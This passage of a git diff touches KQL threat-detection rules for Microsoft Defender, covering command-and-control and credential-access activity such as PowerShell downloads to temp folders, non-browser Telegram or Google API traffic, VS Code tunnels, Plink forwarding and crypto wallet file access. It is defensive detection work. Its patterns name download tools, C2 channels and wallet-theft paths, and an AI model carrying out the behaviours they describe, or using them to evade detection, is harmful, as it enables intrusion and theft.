Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and (ProcessCommandLine contains " -ur" or ProcessCommandLine contains " -o") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains ":\\Windows\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql index 4ab6508c..b41eb155 100644 --- a/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql +++ b/KQL/rules/Command and Control/suspicious_invoke_webrequest_execution_with_directip.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Invoke-WebRequest Execution With DirectIP -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-21 -// Level: medium -// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Suspicious Invoke-WebRequest Execution With DirectIP +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-21 +// Level: medium +// Description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql index d7490876..da71f0ab 100644 --- a/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql +++ b/KQL/rules/Command and Control/suspicious_mstsc_exe_execution_with_local_rdp_file.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Mstsc.EXE Execution With Local RDP File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-18 -// Level: high -// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Likelihood is related to how often the paths are used in the environment - -DeviceProcessEvents +// Title: Suspicious Mstsc.EXE Execution With Local RDP File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Likelihood is related to how often the paths are used in the environment + +DeviceProcessEvents | where (ProcessCommandLine endswith ".rdp" or ProcessCommandLine endswith ".rdp\"") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\System32\\spool\\drivers\\color" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks_Migrated " or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Tracing\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Downloads\\") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql index a919392d..bc7155c4 100644 --- a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql +++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Non-Browser Network Communication With Google API -// Author: Gavin Knapp -// Date: 2023-05-01 -// Level: medium -// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1102 -// False Positives: -// - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning. - -DeviceNetworkEvents +// Title: Suspicious Non-Browser Network Communication With Google API +// Author: Gavin Knapp +// Date: 2023-05-01 +// Level: medium +// Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1102 +// False Positives: +// - Legitimate applications communicating with the "googleapis.com" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning. + +DeviceNetworkEvents | where (RemoteUrl contains "drive.googleapis.com" or RemoteUrl contains "oauth2.googleapis.com" or RemoteUrl contains "sheets.googleapis.com" or RemoteUrl contains "www.googleapis.com") and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft\\EdgeCore\\") and (InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\Mozilla Firefox\\firefox.exe" or InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Mozilla Firefox\\firefox.exe") or (InitiatingProcessFolderPath contains ":\\Program Files\\Google\\Drive File Stream\\" and InitiatingProcessFolderPath endswith "\\GoogleDriveFS.exe") or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or (InitiatingProcessFolderPath endswith ":\\Program Files (x86)\\Internet Explorer\\iexplore.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\Internet Explorer\\iexplore.exe") or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql index 9eeb953e..9fbe84a1 100644 --- a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql +++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_telegram_api.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Non-Browser Network Communication With Telegram API -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-19 -// Level: medium -// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105 -// False Positives: -// - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc. - -DeviceNetworkEvents +// Title: Suspicious Non-Browser Network Communication With Telegram API +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-19 +// Level: medium +// Description: Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.exfiltration, attack.t1102, attack.t1567, attack.t1105 +// False Positives: +// - Legitimate applications communicating with the Telegram API e.g. web browsers not in the exclusion list, app with an RSS etc. + +DeviceNetworkEvents | where RemoteUrl contains "api.telegram.org" and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe"))) \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql index 9930d2d0..d1f4c7e6 100644 --- a/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql +++ b/KQL/rules/Command and Control/suspicious_plink_port_forwarding.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Plink Port Forwarding -// Author: Florian Roth (Nextron Systems) -// Date: 2021-01-19 -// Level: high -// Description: Detects suspicious Plink tunnel port forwarding to a local port -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001 -// False Positives: -// - Administrative activity using a remote port forwarding to a local port - -DeviceProcessEvents +// Title: Suspicious Plink Port Forwarding +// Author: Florian Roth (Nextron Systems) +// Date: 2021-01-19 +// Level: high +// Description: Detects suspicious Plink tunnel port forwarding to a local port +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001 +// False Positives: +// - Administrative activity using a remote port forwarding to a local port + +DeviceProcessEvents | where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client" \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql index ec8162c5..ad3db279 100644 --- a/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql +++ b/KQL/rules/Command and Control/suspicious_tscon_start_as_system.kql @@ -1,10 +1,10 @@ -// Title: Suspicious TSCON Start as SYSTEM -// Author: Florian Roth (Nextron Systems) -// Date: 2018-03-17 -// Level: high -// Description: Detects a tscon.exe start as LOCAL SYSTEM -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 - -DeviceProcessEvents +// Title: Suspicious TSCON Start as SYSTEM +// Author: Florian Roth (Nextron Systems) +// Date: 2018-03-17 +// Level: high +// Description: Detects a tscon.exe start as LOCAL SYSTEM +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 + +DeviceProcessEvents | where FolderPath endswith "\\tscon.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") \ No newline at end of file diff --git a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql index 235b6f08..93c86590 100644 --- a/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql +++ b/KQL/rules/Command and Control/suspicious_velociraptor_child_process.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Velociraptor Child Process -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-08-29 -// Level: high -// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219 -// False Positives: -// - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts. - -DeviceProcessEvents +// Title: Suspicious Velociraptor Child Process +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-08-29 +// Level: high +// Description: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.persistence, attack.defense-evasion, attack.t1219 +// False Positives: +// - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\Velociraptor.exe" and ((ProcessCommandLine contains "msiexec" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "http") or ((ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR " or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "code.exe" and ProcessCommandLine contains "tunnel" and ProcessCommandLine contains "--accept-server-license-terms")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/teamviewer_remote_session.kql b/KQL/rules/Command and Control/teamviewer_remote_session.kql index 74ae312f..5a39750e 100644 --- a/KQL/rules/Command and Control/teamviewer_remote_session.kql +++ b/KQL/rules/Command and Control/teamviewer_remote_session.kql @@ -1,12 +1,12 @@ -// Title: TeamViewer Remote Session -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-30 -// Level: medium -// Description: Detects the creation of log files during a TeamViewer remote session -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate uses of TeamViewer in an organisation - -DeviceFileEvents +// Title: TeamViewer Remote Session +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-30 +// Level: medium +// Description: Detects the creation of log files during a TeamViewer remote session +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate uses of TeamViewer in an organisation + +DeviceFileEvents | where (FolderPath endswith "\\TeamViewer\\RemotePrinting\\tvprint.db" or FolderPath endswith "\\TeamViewer\\TVNetwork.log") or (FolderPath contains "\\TeamViewer" and FolderPath contains "_Logfile.log") \ No newline at end of file diff --git a/KQL/rules/Command and Control/tor_client_browser_execution.kql b/KQL/rules/Command and Control/tor_client_browser_execution.kql index bfc1c1fd..48359a1e 100644 --- a/KQL/rules/Command and Control/tor_client_browser_execution.kql +++ b/KQL/rules/Command and Control/tor_client_browser_execution.kql @@ -1,10 +1,10 @@ -// Title: Tor Client/Browser Execution -// Author: frack113 -// Date: 2022-02-20 -// Level: high -// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1090.003 - -DeviceProcessEvents +// Title: Tor Client/Browser Execution +// Author: frack113 +// Date: 2022-02-20 +// Level: high +// Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1090.003 + +DeviceProcessEvents | where FolderPath endswith "\\tor.exe" or FolderPath endswith "\\Tor Browser\\Browser\\firefox.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql index 493f650f..2b12190b 100644 --- a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql +++ b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql @@ -1,11 +1,11 @@ -// Title: Uncommon Network Connection Initiated By Certutil.EXE -// Author: frack113, Florian Roth (Nextron Systems) -// Date: 2022-09-02 -// Level: high -// Description: Detects a network connection initiated by the certutil.exe utility. -// Attackers can abuse the utility in order to download malware or additional payloads. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 - -DeviceNetworkEvents +// Title: Uncommon Network Connection Initiated By Certutil.EXE +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects a network connection initiated by the certutil.exe utility. +// Attackers can abuse the utility in order to download malware or additional payloads. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceNetworkEvents | where (RemotePort in~ ("80", "135", "443", "445")) and InitiatingProcessFolderPath endswith "\\certutil.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql index 073def73..34381a05 100644 --- a/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql +++ b/KQL/rules/Command and Control/use_of_ultravnc_remote_access_software.kql @@ -1,12 +1,12 @@ -// Title: Use of UltraVNC Remote Access Software -// Author: frack113 -// Date: 2022-10-02 -// Level: medium -// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1219.002 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Use of UltraVNC Remote Access Software +// Author: frack113 +// Date: 2022-10-02 +// Level: medium +// Description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "VNCViewer" or ProcessVersionInfoProductName =~ "UltraVNC VNCViewer" or ProcessVersionInfoCompanyName =~ "UltraVNC" or ProcessVersionInfoOriginalFileName =~ "VNCViewer.exe" \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql index 0b3c798a..d38c1c38 100644 --- a/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_execution.kql @@ -1,12 +1,12 @@ -// Title: Visual Studio Code Tunnel Execution -// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja -// Date: 2023-10-25 -// Level: medium -// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 -// False Positives: -// - Legitimate use of Visual Studio Code tunnel - -DeviceProcessEvents +// Title: Visual Studio Code Tunnel Execution +// Author: Nasreddine Bencherchali (Nextron Systems), citron_ninja +// Date: 2023-10-25 +// Level: medium +// Description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001, attack.t1219 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel + +DeviceProcessEvents | where (ProcessCommandLine endswith ".exe tunnel" and isnull(ProcessVersionInfoOriginalFileName)) or ((ProcessCommandLine contains "/d /c " and ProcessCommandLine contains "\\servers\\Stable-" and ProcessCommandLine contains "code-server.cmd") and FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine endswith " tunnel") or (ProcessCommandLine contains ".exe tunnel" and ProcessCommandLine contains "--accept-server-license-terms") \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql index a123605d..4f34b52a 100644 --- a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql @@ -1,10 +1,10 @@ -// Title: Visual Studio Code Tunnel Remote File Creation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-25 -// Level: medium -// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control - -DeviceFileEvents +// Title: Visual Studio Code Tunnel Remote File Creation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control + +DeviceFileEvents | where InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe" and FolderPath contains "\\.vscode-server\\data\\User\\History\\" \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql index 58a39f23..ece67324 100644 --- a/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_service_installation.kql @@ -1,12 +1,12 @@ -// Title: Visual Studio Code Tunnel Service Installation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-25 -// Level: medium -// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071.001 -// False Positives: -// - Legitimate installation of code-tunnel as a service - -DeviceProcessEvents +// Title: Visual Studio Code Tunnel Service Installation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the installation of VsCode tunnel (code-tunnel) as a service. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Legitimate installation of code-tunnel as a service + +DeviceProcessEvents | where ProcessCommandLine contains "tunnel " and ProcessCommandLine contains "service" and ProcessCommandLine contains "internal-run" and ProcessCommandLine contains "tunnel-service.log" \ No newline at end of file diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql index 9174c8fe..8b11bba6 100644 --- a/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql +++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_shell_execution.kql @@ -1,12 +1,12 @@ -// Title: Visual Studio Code Tunnel Shell Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-25 -// Level: medium -// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1071.001 -// False Positives: -// - Legitimate use of Visual Studio Code tunnel and running code from there - -DeviceProcessEvents +// Title: Visual Studio Code Tunnel Shell Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-25 +// Level: medium +// Description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1071.001 +// False Positives: +// - Legitimate use of Visual Studio Code tunnel and running code from there + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains ".vscode-server" and InitiatingProcessFolderPath contains "\\servers\\Stable-" and InitiatingProcessFolderPath endswith "\\server\\node.exe") and ((ProcessCommandLine contains "\\terminal\\browser\\media\\shellIntegration.ps1" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bash.exe")) \ No newline at end of file diff --git a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql index b494b440..269ff083 100644 --- a/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql +++ b/KQL/rules/Command and Control/wget_creating_files_in_tmp_directory.kql @@ -1,12 +1,12 @@ -// Title: Wget Creating Files in Tmp Directory -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: medium -// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" -// MITRE Tactic: Command and Control -// Tags: attack.command-and-control, attack.t1105 -// False Positives: -// - Legitimate downloads of files in the tmp folder. - -DeviceFileEvents +// Title: Wget Creating Files in Tmp Directory +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate downloads of files in the tmp folder. + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "/wget" and (FolderPath startswith "/tmp/" or FolderPath startswith "/var/tmp/") \ No newline at end of file diff --git a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql index 0d746a56..6d4e9790 100644 --- a/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql +++ b/KQL/rules/Credential Access/access_to_crypto_currency_wallets_by_uncommon_applications.kql @@ -1,16 +1,16 @@ -// Title: Access To Crypto Currency Wallets By Uncommon Applications -// Author: X__Junior (Nextron Systems) -// Date: 2024-07-29 -// Level: medium -// Description: Detects file access requests to crypto currency files by uncommon processes. -// Could indicate potential attempt of crypto currency wallet stealing. -// MITRE Tactic: Credential Access -// Tags: attack.t1003, attack.credential-access -// False Positives: -// - Antivirus, Anti-Spyware, Anti-Malware Software -// - Backup software -// - Legitimate software installed on partitions other than "C:\" -// - Searching software such as "everything.exe" - -DeviceFileEvents +// Title: Access To Crypto Currency Wallets By Uncommon Applications +// Author: X__Junior (Nextron Systems) +// Date: 2024-07-29 +// Level: medium +// Description: Detects file access requests to crypto currency files by uncommon processes. +// Could indicate potential attempt of crypto currency wallet stealing. +// MITRE Tactic: Credential Access +// Tags: attack.t1003, attack.credential-access +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Backup software +// - Legitimate software installed on partitions other than "C:\" +// - Searching software such as "everything.exe" + +DeviceFileEvents | where ((FileName contains "\\AppData\\Roaming\\Ethereum\\keystore\\" or FileName contains "\\AppData\\Roaming\\EthereumClassic\\keystore\\" or FileName contains "\\AppData\\Roaming\\monero\\wallets\\") or (FileName endswith "\\AppData\\Roaming\\Bitcoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinABC\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\BitcoinSV\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DashCore\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\DogeCoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Litecoin\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Ripple\\wallet.dat" or FileName endswith "\\AppData\\Roaming\\Zcash\\wallet.dat")) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\system32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or InitiatingProcessFolderPath =~ "System"))) and (not(((InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith 